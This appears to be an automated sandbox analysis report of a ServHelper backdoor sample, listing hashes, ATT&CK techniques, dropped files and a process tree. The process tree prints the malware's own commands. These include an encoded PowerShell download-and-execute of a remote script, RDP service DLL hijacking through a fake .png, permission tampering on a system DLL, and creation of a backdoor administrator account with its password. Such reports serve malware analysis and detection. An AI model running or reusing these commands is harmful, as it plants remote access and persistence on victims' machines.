servhelper | aee35491525d86d85dc0f6410525ba82673d7691d4035436154f395430a23594

Analysis

max time kernel
129s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
12-03-2024 07:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c2d4bd5b611d2adb39200dc461255d5f.exe
Size

6.9MB
MD5

c2d4bd5b611d2adb39200dc461255d5f
SHA1

d4ee36f705dad290f9beb74da59c9d147d47dc3b
SHA256

aee35491525d86d85dc0f6410525ba82673d7691d4035436154f395430a23594
SHA512

631fe15d69b6591e7538277546f694fe6361ca1d485aab2de4406aa460ffc316f2156e44d08124d24cf43197cf154e983c563efa21078b99e4a2524968514668
SSDEEP

98304:ipb2Sar8+l1PRdU6wjvo8+NcbCOX69G50zPtzKgu0t5tZgPVWp0vHbSxKyxmxFNz:i8SaoIR6xsu/qQm+gp6zvy3xmXRB

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
7	588	powershell.exe
8	588	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid	Process
2044	icacls.exe
1760	icacls.exe
1848	icacls.exe
644	icacls.exe
2256	takeown.exe
1924	icacls.exe
1276	icacls.exe
1344	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid	Process
1468
1468

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid	Process
1924	icacls.exe
1276	icacls.exe
1344	icacls.exe
2044	icacls.exe
1760	icacls.exe
1848	icacls.exe
644	icacls.exe
2256	takeown.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/files/0x000c000000013aa6-107.dat	upx
behavioral1/files/0x000a0000000140f7-108.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XM83S3VKAB8ICMI0TKYB.temp	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

WMIC.exe

pid	Process
2424	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b0998a5174da01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
1724	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2916	powershell.exe
592	powershell.exe
956	powershell.exe
596	powershell.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
588	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid	Process
464
1468
1468
1468
1468

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

c2d4bd5b611d2adb39200dc461255d5f.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	2460	c2d4bd5b611d2adb39200dc461255d5f.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	592	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	596	powershell.exe
Token: SeRestorePrivilege	1276	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2424	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2424	WMIC.exe
Token: SeAuditPrivilege	2424	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2424	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2424	WMIC.exe
Token: SeAuditPrivilege	2424	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1936	WMIC.exe
Token: SeAuditPrivilege	1936	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1936	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1936	WMIC.exe
Token: SeAuditPrivilege	1936	WMIC.exe
Token: SeDebugPrivilege	588	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c2d4bd5b611d2adb39200dc461255d5f.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	Process	procid_target
PID 2460 wrote to memory of 2916	2460	c2d4bd5b611d2adb39200dc461255d5f.exe	29
PID 2460 wrote to memory of 2916	2460	c2d4bd5b611d2adb39200dc461255d5f.exe	29
PID 2460 wrote to memory of 2916	2460	c2d4bd5b611d2adb39200dc461255d5f.exe	29
PID 2916 wrote to memory of 2920	2916	powershell.exe	31
PID 2916 wrote to memory of 2920	2916	powershell.exe	31
PID 2916 wrote to memory of 2920	2916	powershell.exe	31
PID 2920 wrote to memory of 1028	2920	csc.exe	32
PID 2920 wrote to memory of 1028	2920	csc.exe	32
PID 2920 wrote to memory of 1028	2920	csc.exe	32
PID 2916 wrote to memory of 592	2916	powershell.exe	33
PID 2916 wrote to memory of 592	2916	powershell.exe	33
PID 2916 wrote to memory of 592	2916	powershell.exe	33
PID 2916 wrote to memory of 956	2916	powershell.exe	35
PID 2916 wrote to memory of 956	2916	powershell.exe	35
PID 2916 wrote to memory of 956	2916	powershell.exe	35
PID 2916 wrote to memory of 596	2916	powershell.exe	37
PID 2916 wrote to memory of 596	2916	powershell.exe	37
PID 2916 wrote to memory of 596	2916	powershell.exe	37
PID 2916 wrote to memory of 2256	2916	powershell.exe	39
PID 2916 wrote to memory of 2256	2916	powershell.exe	39
PID 2916 wrote to memory of 2256	2916	powershell.exe	39
PID 2916 wrote to memory of 1924	2916	powershell.exe	40
PID 2916 wrote to memory of 1924	2916	powershell.exe	40
PID 2916 wrote to memory of 1924	2916	powershell.exe	40
PID 2916 wrote to memory of 1276	2916	powershell.exe	41
PID 2916 wrote to memory of 1276	2916	powershell.exe	41
PID 2916 wrote to memory of 1276	2916	powershell.exe	41
PID 2916 wrote to memory of 1344	2916	powershell.exe	42
PID 2916 wrote to memory of 1344	2916	powershell.exe	42
PID 2916 wrote to memory of 1344	2916	powershell.exe	42
PID 2916 wrote to memory of 2044	2916	powershell.exe	43
PID 2916 wrote to memory of 2044	2916	powershell.exe	43
PID 2916 wrote to memory of 2044	2916	powershell.exe	43
PID 2916 wrote to memory of 1760	2916	powershell.exe	44
PID 2916 wrote to memory of 1760	2916	powershell.exe	44
PID 2916 wrote to memory of 1760	2916	powershell.exe	44
PID 2916 wrote to memory of 1848	2916	powershell.exe	45
PID 2916 wrote to memory of 1848	2916	powershell.exe	45
PID 2916 wrote to memory of 1848	2916	powershell.exe	45
PID 2916 wrote to memory of 644	2916	powershell.exe	46
PID 2916 wrote to memory of 644	2916	powershell.exe	46
PID 2916 wrote to memory of 644	2916	powershell.exe	46
PID 2916 wrote to memory of 2180	2916	powershell.exe	47
PID 2916 wrote to memory of 2180	2916	powershell.exe	47
PID 2916 wrote to memory of 2180	2916	powershell.exe	47
PID 2916 wrote to memory of 1724	2916	powershell.exe	48
PID 2916 wrote to memory of 1724	2916	powershell.exe	48
PID 2916 wrote to memory of 1724	2916	powershell.exe	48
PID 2916 wrote to memory of 2028	2916	powershell.exe	49
PID 2916 wrote to memory of 2028	2916	powershell.exe	49
PID 2916 wrote to memory of 2028	2916	powershell.exe	49
PID 2916 wrote to memory of 2992	2916	powershell.exe	50
PID 2916 wrote to memory of 2992	2916	powershell.exe	50
PID 2916 wrote to memory of 2992	2916	powershell.exe	50
PID 2992 wrote to memory of 1884	2992	net.exe	51
PID 2992 wrote to memory of 1884	2992	net.exe	51
PID 2992 wrote to memory of 1884	2992	net.exe	51
PID 2916 wrote to memory of 2100	2916	powershell.exe	52
PID 2916 wrote to memory of 2100	2916	powershell.exe	52
PID 2916 wrote to memory of 2100	2916	powershell.exe	52
PID 2100 wrote to memory of 2096	2100	cmd.exe	53
PID 2100 wrote to memory of 2096	2100	cmd.exe	53
PID 2100 wrote to memory of 2096	2100	cmd.exe	53
PID 2096 wrote to memory of 1112	2096	cmd.exe	54

C:\Users\Admin\AppData\Local\Temp\c2d4bd5b611d2adb39200dc461255d5f.exe
"C:\Users\Admin\AppData\Local\Temp\c2d4bd5b611d2adb39200dc461255d5f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2916
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e9dcgiwx.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BFD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6BFC.tmp"
      4⤵
      PID:1028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:596
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2256
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1924
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1344
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2044
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1760
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1848
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:644
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2180
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1724
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2028
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:1884
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2100
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2096
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1112
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1448
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:1872
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:108
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:1560
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1720
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2148
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:1656

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:2968
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:1644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:1264

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Itt9EyuK /add
1⤵
PID:1504
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Itt9EyuK /add
  2⤵
  PID:2000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Itt9EyuK /add
    3⤵
    PID:1888

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:2060
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1916

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MGILJUBR$ /ADD
1⤵
PID:1152
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" MGILJUBR$ /ADD
  2⤵
  PID:2124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MGILJUBR$ /ADD
    3⤵
    PID:2912

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1520
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2624

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Itt9EyuK
1⤵
PID:1748
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Itt9EyuK
  2⤵
  PID:2656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Itt9EyuK
    3⤵
    PID:2592

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2360
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2424

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2328
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1936

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:584
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6BFD.tmp

Filesize
1KB

MD5
f1571f539b81b72aa1b064299331f64d

SHA1
ad01b47f4426b5fc091bda03ee61796566c498b8

SHA256
3f85eb1a94ba2f87f04a16fe9768c5a883e179b6136c958f186cef45a03231e5

SHA512
baf3df6ad93f90bacb48748dd28582099f6443bc823beabbca4443894533301c9d2d3d9412b07aef25ca206bc91f56a27823dbb1d8078b96baab585781d4723f

Download Submit
C:\Users\Admin\AppData\Local\Temp\e9dcgiwx.dll

Filesize
3KB

MD5
d94c2627d6eaf10966ae8025cb6b7464

SHA1
da61b093e6d473b62a2281bd210350f8724575a6

SHA256
aa8c8bdde39407e8f36f75820a3132ee60ae861a7b1ad011275c55ca7713bb0b

SHA512
915fd15e1c2fbb517048c6c5ff6ef0d3a7fd50b4e79c58744b79e0d78956ca7c8b720624a030aae105e0019128deaf3dabb935e4b388af2e422c878bcfa12042

Download Submit
C:\Users\Admin\AppData\Local\Temp\e9dcgiwx.pdb

Filesize
7KB

MD5
f472ee2b32c5db5d027f4bfd168fddd0

SHA1
fcdc04cd5e0bfa806dbcdd5da0eb13230318ce91

SHA256
1af2ecb66950b8d11dcd865e9d3a931bba1362d161684c8179f0efac36189c74

SHA512
35b9dd83217fa0832be3de4bc6aeeae9968152fb23e3b0f66e2c732e9c93edd84282dcef7defad1a1c29383dd374b15f48bc0645bd86ad3b477ba17d62e5a33a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
c16f184d9d62eddb657c4a000477bed7

SHA1
5cae0c725cec08ec9bc5a2b246f55401329641f6

SHA256
eb5ed128539eeb68644aa0546eb88a8ee6c35e9bb0627dff4d59f6ac9b114528

SHA512
c8e8c2151a2fef875ce447dd857fdafcfd172d2f1ad5fe6d72caeed173efc1a64c296b50b98c61dec8b61f5ae05ca1b9e742fa19b851deee476537d55b089628

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
5b089cec3eb8b03530a8264041bece2b

SHA1
6417d8ccd3ebd5d290bf7631d287453d07cd79a5

SHA256
e081125410768cc7bc6c09c3ece3d4940562b6f4135d8165845c3d9d780721cf

SHA512
40de0a97eef9342b83af8e45f59484b1dd9e0faa9dd2d073d75f9d87fcfcf29afbeb179eba2faef4edf5debe291103f8bbc9a2672c60364dbb0c26fa9800009f

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6BFC.tmp

Filesize
652B

MD5
d77ac9cbba340499daed4330403ec956

SHA1
c9e9b8318820d6c6c5d9bc888e9c885c5a6bea48

SHA256
06e579ddcd72548f7e5dfb71da12608244a55088f0d6050538a974f1650b1b65

SHA512
16e389271c767ddc9eeca2a4a3e83f8c655f0827d9356cf879efd639ab0f037bf48d3a88f1a3314aea0df9232af5fa26126f86930149dcabd600936c750a6c8e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e9dcgiwx.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e9dcgiwx.cmdline

Filesize
309B

MD5
4ce1bc762c7bb4e61fcae91e249415f6

SHA1
806a46d3a10e484473c7112ee503fd208722ffd3

SHA256
162ee52cded4324f6f7c5839ac773c0352ea97d0d297c3cea00eaeeab82b5ab8

SHA512
b6fde4585f20ef2530bc5838d0e04815ce55d32b3f9685293abb0f905a0c1dd8ef1d72d35d5f6f1921a344375749e40476c9d9bea9de3871ad3d1efcf9e99f3f

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
596ca1d187937a1a2bca34d8c8993f1f

SHA1
bb3dfb10cb06dddc4e58d8b3f5a08b8908378820

SHA256
7fce3b42b061497b14f16421ddafd75d3a56be2ebd081f2bd84157b0166803b7

SHA512
bde56fd03c38274033a8195ba1aba3645cb03821ba18db7b35f6a9062ee20f8df29e9e108a3f887c8bee4b5487ace1bd2e374ef9418aac4460a31437ba075df0

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
537f4dfd0535f687393b715b914c04a9

SHA1
852d52cf10f677e2abe2ecedd7693d9a9bf20e02

SHA256
ccf72f75efe3153a55507d1e73f0f366d380d1923ee912e2e0fee825367a56bc

SHA512
ccf483927c1a05b0af093d86c6f0f802ee0d199f8862cdf25667114a30ecb0c64ef55e96d2744b7149d8a444ea0001d78189862095942d38801e27045804141c

Download Submit
memory/588-114-0x000007FEEE050000-0x000007FEEE9ED000-memory.dmp

Filesize
9.6MB

Download
memory/588-115-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/588-116-0x000007FEEE050000-0x000007FEEE9ED000-memory.dmp

Filesize
9.6MB

Download
memory/588-117-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/588-118-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/588-119-0x00000000011B0000-0x0000000001230000-memory.dmp

Filesize
512KB

Download
memory/588-120-0x000007FEEE050000-0x000007FEEE9ED000-memory.dmp

Filesize
9.6MB

Download
memory/592-58-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/592-59-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/592-61-0x000007FEEE050000-0x000007FEEE9ED000-memory.dmp

Filesize
9.6MB

Download
